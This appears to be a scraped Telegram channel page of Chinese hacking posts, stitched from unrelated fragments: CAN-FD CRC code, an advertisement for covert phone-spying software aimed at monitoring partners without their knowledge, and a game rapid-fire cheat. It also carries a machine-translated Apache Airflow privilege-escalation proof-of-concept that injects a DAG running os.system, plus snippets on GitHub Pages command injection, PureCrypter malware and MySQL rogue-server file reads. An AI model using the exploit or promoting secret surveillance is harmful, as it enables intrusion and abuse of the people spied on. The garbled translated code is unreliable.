红客解密程序 暗网编程
27.3K subscribers
966 photos
12 videos
1 file
56 links
渗透测试,#删库,数据删除 拿数据库 木马注入 破解,提权,Dns动持
Download Telegram
代码语言:javascript
//算法1
U16 Can_FD_Analyzer::ComputeCrc15(std::vector<BitState> &bits, U32 num_bits)
{

//X15 + X14 + X10 + X8 + X7 + X4 + X3 + X0.
U16 crc_result = 0;
for (U32 i = 0; i < num_bits; i++) {

BitState next_bit = bits[i];

//Exclusive or
if ((crc_result & 0x4000) != 0) {

next_bit = Invert(next_bit); //if the msb of crc_result is zero, then next_bit is not inverted; otherwise, it is.
}
crc_result <<= 1;

if (next_bit == mSettings->Recessive()) {
//normally bit high.
crc_result ^= 0x4599;
}
}

return crc_result & 0x7FFF;
}

//算法2
U16 Can_FD_Analyzer::MakeCRC15(std::vector<BitState> &bits, U32 num_bits)
{

//X15 + X14 + X10 + X8 + X7 + X4 + X3 + X0.
U16 CRC[15] = {
0 };
for (U32 i = 0; i < num_bits; i++) {

U32 DoInvert = (bits[i] == mSettings->Recessive()) ^ CRC[14]; //XOR required?
CRC[14] = (CRC[13] ^ DoInvert); //14
CRC[13] = CRC[12];
CRC[12] = CRC[11];
CRC[11] = CRC[10];
CRC[10] = (CRC[9] ^ DoInvert); //10
CRC[9] = CRC[8];
CRC[8] = (CRC[7] ^ DoInvert); //8
CRC[7] = (CRC[6] ^ DoInvert); //7
CRC[6] = CRC[5];
CRC[5] = CRC[4];
CRC[4] = (CRC[3] ^ DoInvert); //4
CRC[3] = (CRC[2] ^ DoInvert); //3
CRC[2] = CRC[1];
CRC[1] = CRC[0];
CRC[0] = DoInvert;
}

U16 result = 0; // CRC Result
for (U32 i = 0; i < 15; i++) {

result = result | (CRC[i] << i);
}
return (U16)result;
}
uMbox
在我的研究过程中, 是一款出色的家长跟踪工具 Android 手机和平板电脑。我可以在我的目标人不知情的情况下安装它,因为它在后台运行,几分钟内就可以安装完成。这可以帮助父母和配偶秘密地跟踪他们的孩子和伴侣的活动

特色:
短信监控: 您可以阅读所有短信,包括已删除的短信,以跟踪所有通信。我还可以查看发件人的详细信息,例如他们的全名和消息的发送时间。

通话记录访问: 我可以查看通话记录,包括时间戳和通话时长,以查看详细的通话信息。它还向我显示了记录中删除的通话以及呼叫者的身份。

实时 GPS 跟踪: 帮助我查看此人的实时 GPS 位置,这对于精确的位置跟踪非常有用。

社交媒体监控: 您可以查看 Facebook、Instagram、WhatsApp、Kik 等平台上的所有活动和聊天,实现全面的聊天监控。

媒体访问: 我能够访问所有照片和视频来监控目标设备上的共享媒体。

SIM 卡警报: 当有人更改 SIM 卡时,您会收到警报,确保您随时了解任何更改。

联系查看: 我可以查看目标人员的设备和社交媒体上的所有联系人。它还会在我的仪表板上显示最常发消息的人和来电者
对ZDI公布的InfraSuite Device Master一揽子漏洞的分析

看到zdi发了一堆洞,有反序列化、目录穿越、权限绕过等等,还是dotnet的,于是有了此文

这个漏洞在3100和3110端口

从TCP服务器到业务处理的逻辑如下

StartGatewayOperation中设置了网关服务的一些配置
正常游戏逻辑中,点击一次鼠标会触发一发子弹的射击。而在操作系统层面上,每点击一次鼠标游戏就会发送一次鼠标点击的消息,如果在游戏允许的时间范围内增加鼠标点击消息的发送,那么就可以实现武器的子弹加速,这种效果在霰弹枪上面即为明显,可以实现单发射击的霰弹枪变成连续射击,武器致死率大大提升
Apache Airflow 2.3.4 之前的版本中有多个组件的守护进程 umask 不安全,为 0,导致关键文件和目录可以被所有人写入。因此,任何本地用户都可以推断 Airflow 处理特制的输入,并最终对执行 Airflow 的用户执行特权升级。特别是调度程序组件很容易被利用。

概念验证
以下攻击针对 Apache Airflow 的演示安装(airflow scheduler使用该标志运行时--daemon):

/bin/bash #!/bin/bash
目标=/home/airflow
umask 0
cd $TARGET/logs/scheduler/latest/native_dags/example_dags
rm example_bash_operator.py.log
ln -s $TARGET/dags/poc.py example_bash_operator.py.log
直到[ -f $TARGET/dags/poc.py ]

睡眠 1
完毕
rm example_bash_operator.py.log
(cat<<'EOF'
导入操作系统
os.system("id >>/tmp/pwned")
从气流导入 DAG
末梢血
)> $TARGET/dags/poc.py

当 Airflow 调度程序重新启动时,会触发注入的 DAG 有效负载(代码执行)。这个简单的 PoC 可执行完整的任意代码执行,但也存在通过自定义 DAG 获得控制权的其他方法。


影响
权限提升:丧失机密性、完整性和可用性
参数注入代码执行
官方披露的漏洞效果是仅在有只读权限情况下可以进行命令执行,通过枚举应用所有只读权限情况下可以构造的 git 指令,找到一处进行参数注入,构造恶意 url 访问即可造成任意命令执行。
GitHub Pages 构建管道中的命令注入
GitHub 页面
GitHub Pages是一种静态内容托管服务。它允许用户在或自定义域上托管其存储库的内容username.github.io。它广泛用于托管简单的静态页面,例如文档和博客(例如,此博客托管在 GitHub Pages 上)。

为了帮助用户托管美观的内容,GitHub Pages 支持静态站点生成器平台Jekyll。使用 Jekyll,您不必为博客编写 HTML 和 CSS,但您可以编写 Markdown,Jekyll 会将其转换为 HTML 文件。为了更轻松地在整个网站上应用相同的模板和样式,Jekyll 支持主题。

Jekyll 站点的所有设置(例如主题)都存储在 YAML 配置文件中。GitHub Pages 自动执行 Jekyll 设置的部分工作(包括设置某些设置)。

顾名思义,这将自动执行选择 Jekyll 主题的过程。

此 URL 有三个参数:

select是当前选定的主题(如果已经选择了主题)。
source是分支设置中选择的分支。
source_dir是分支设置中选择的目录。
如果我们点击更改主题按钮,我们将进入一个新网页,其中显示多个 Jekyll 主题的预览

但是如果我们在主题选择器 URL 中指定另一个目录会发生什么?事实证明,这是可以接受的行为,Gi​​tHub 将使用我们提供的任何目录名称作为源。例如,如果我们使用一个深奥的目录名称,如source_dir=/"test" test test>,GitHub 将在中创建一个基本的 Jekyll 设置/"test" test test>
C2分析
这个C2在我们检测到的C2中活跃度比较高,其活跃时间为今年4月中旬到6月初,其活跃程度可以用我们的图系统直观反映出来

能看到它关联到了比较多的域名和IP,下面是该IP在这段时间的部分域名解析情况

传播分析
PureCrypter采用了downloader+injector的双模块机制,前者被传播后再传播后者,相当于在传播链条上增加了一环,加上作者惯用图片名后缀、编码传输等手段隐藏injector,这些本身就已足够复杂。而作者在downloader传播这块也下了不少功夫,我们看到的有通过bat2exe捆绑破解软件的方式、使用VBS和powershell脚本loader的方式、结合Godzilla前置loader等多种方式,这些操作叠加起来的结果就是PureCrypter的传播链条普遍较深较复杂。在5月份我们甚至发现通过PureCrypter传播Raccoon,后者进一步传播Azorult、Remcos、PureMiner、PureClipper的案例
Navicat登录认证分析
本文以Navicat16 试用版为例进行分析,登录流程与上述分析相差不多,在登录认证成功之后多了一个查询的操作

MySQL服务端可以利用LOAD DATA LOCAL命令来读取MYSQL客户端的任意文件,然后伪造恶意服务器向连接到这个服务器的客户端发送读取文件的payload。
load data infile语句从一个文本文件中以很高的速度读入一个表中。
首先在本地使用phpstudy开启数据库,并且使用Navicat进行连接